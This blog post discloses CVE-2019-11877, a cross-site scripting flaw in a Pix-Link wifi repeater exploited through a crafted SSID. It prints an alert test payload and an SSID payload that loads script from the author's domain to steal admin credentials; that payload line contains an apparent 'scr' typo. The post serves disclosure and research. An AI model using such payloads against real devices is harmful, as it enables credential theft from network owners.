[CVE-2019–11877] Credentials Stealing Through XSS on Pix-Link Repeater

I needed a wifi repeater for my house and bought a Pix-Link LV-WR09 for being one of the cheapest. I thought “What could go wrong with that?”

When I entered the repeater configuration page I saw that in the network listing function it could be vulnerable to a Cross-Site Scripting attack over a wifi network with the malicious BSSID.

I used my smartphone to create a wifi network named

<script>alert(‘XSS’)</script> 

And did the test:

Yes! He’s vulnerable!!

Now it’s time to make a real attack.

The SSID has the restriction to fit a maximum of 32 characters, so I registered a small enough domain:

http://ilrg.xyz/

I changed the SSID in my smartphone to <script scr=//ilrg.xyz></script> and in the index.html I put my script:

Now I just need to go to the settings page of the repeater and scan for available networks.

It will run the XSS and send the data to a file on my server.

It worked!

With this we have a POC!

Sources that served as inspiration:

http://foofus.net/goons/percx/papers/Practical_Exploitation_Using_Malicious_SSIDs.pdf

https://medium.com/caio-noobs-around/roteador-tc7337-dns-poisoning-atrav%C3%A9s-de-xss-1a92ed254120

https://fireshellsecurity.team/cve-2017-14219-xss-no-roteador-intelbras-wrn-240/

Timeline:

28/04/2019 — First email sent to the vendor (no answer)

06/05/2019 — Second email sent to the vendor (no answer)

15/05/2019 — Third email sent to the vendor (no answer)

27/05/2019 — Disclosure